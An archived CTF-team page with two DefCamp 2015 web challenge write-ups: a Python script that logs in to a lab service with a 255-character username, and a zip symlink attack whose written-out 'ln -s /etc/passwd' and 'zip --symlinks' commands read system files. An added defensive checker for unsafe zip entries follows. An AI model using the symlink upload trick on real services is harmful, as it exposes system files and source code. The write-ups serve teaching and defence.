CTF-Team site moved

The CTF-Team has launched a new web presence for their activities. The posts/write-ups below are kept as an archive for interested readers.

WRITEUP – DEFCAMP2015 – Rocket Science Admin Panel – Web 300

In this challenge we are given a registration page and a login page. After registering, we tried to log in, but we were automatically blocked. We wrote a Python script to register and authenticate automatically. The last step we took was to send a huge number of characters to the server: registration and login failed, and we got the register and login mask back as the response. 1024 characters led to a successful registration, but we got a “nop” as the response when logging into the service. When we sent 255 a’s, the login succeeded and the flag was given.

#!/usr/bin/python3

import urllib.request
import urllib.parse

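# Base URL of the challenge service
href = 'http://10.13.37.4/'
params = {}

# urlencode() is called without doseq=True, so this list is sent as its str() form
password = ["hey", "you"]

# 255-character username: the length that led to a successful login
params['username'] = b'a'*255
params['password'] = password
data = urllib.parse.urlencode(params)
data = data.encode('ascii')
# Register the account
req = urllib.request.Request(href+"register.php", data)
print(urllib.request.urlopen(req).read())

# Log in with the same username and password
params['password'] = password
data = urllib.parse.urlencode(params)
data = data.encode('ascii')
req = urllib.request.Request(href+"login.php", data)
print(urllib.request.urlopen(req).read())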

WRITEUP – DEFCAMP2015 – The hylian dude – Web 200

In this challenge we are given a file hosting service. We can upload a zipped file, and the application provides the extracted files for download.

We found a comment in the HTML source indicating that shell_execute was being used. We tried uploading a zip file containing a symbolic link to /var/www/html/index.php, and we were able to download the source code. The next idea was to download /etc/passwd for further information.

ln -s /etc/passwd passwd
zip --symlinks -r passwd.zip passwd

There it is:

...
dctf:x:65533:65533:DCTF,,,:/nonexistent:/DCTF{28fad39245bc57404263540e94f417d8}
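
A pre-extraction check for an upload handler like the one described above, as an added example that is not part of the original write-up or the challenge's code: it reads each entry's Unix mode bits from the zip directory and rejects symbolic links (and, going slightly beyond the case shown, other special files and paths that leave the extraction directory). The function names and the sample archive are constructed for illustration.

```python
import io
import stat
import zipfile


def build_sample_zip():
    """Constructed sample: one regular file plus a symlink entry to /etc/passwd."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "hello")
        link = zipfile.ZipInfo("passwd")
        link.create_system = 3  # Unix, so the high 16 bits hold the file mode
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/etc/passwd")  # a symlink's target is stored as its data
    return buf.getvalue()


def unsafe_entries(zip_bytes):
    """Return (name, reason) for every entry that should not be extracted."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # File type bits of the Unix mode; 0 when the archiver stored none.
            ftype = stat.S_IFMT(info.external_attr >> 16)
            if ftype == stat.S_IFLNK:
                target = zf.read(info).decode("utf-8", "replace")
                findings.append((info.filename, "symlink -> " + target))
            elif ftype not in (0, stat.S_IFREG, stat.S_IFDIR):
                findings.append((info.filename, "special file"))
            # Absolute names or ".." components would land outside the target dir.
            name = info.filename.replace("\\", "/")
            if name.startswith("/") or ".." in name.split("/"):
                findings.append((info.filename, "path escapes extraction dir"))
    return findings


def safe_to_extract(zip_bytes):
    """True only if no entry was flagged; call this before unpacking an upload."""
    return not unsafe_entries(zip_bytes)


if __name__ == "__main__":
    for name, reason in unsafe_entries(build_sample_zip()):
        print("rejected:", name, "(" + reason + ")")
```

Serving extracted files from a directory the web server cannot follow links out of, and running the extraction as a low-privilege user, limits the impact if a check like this is bypassed.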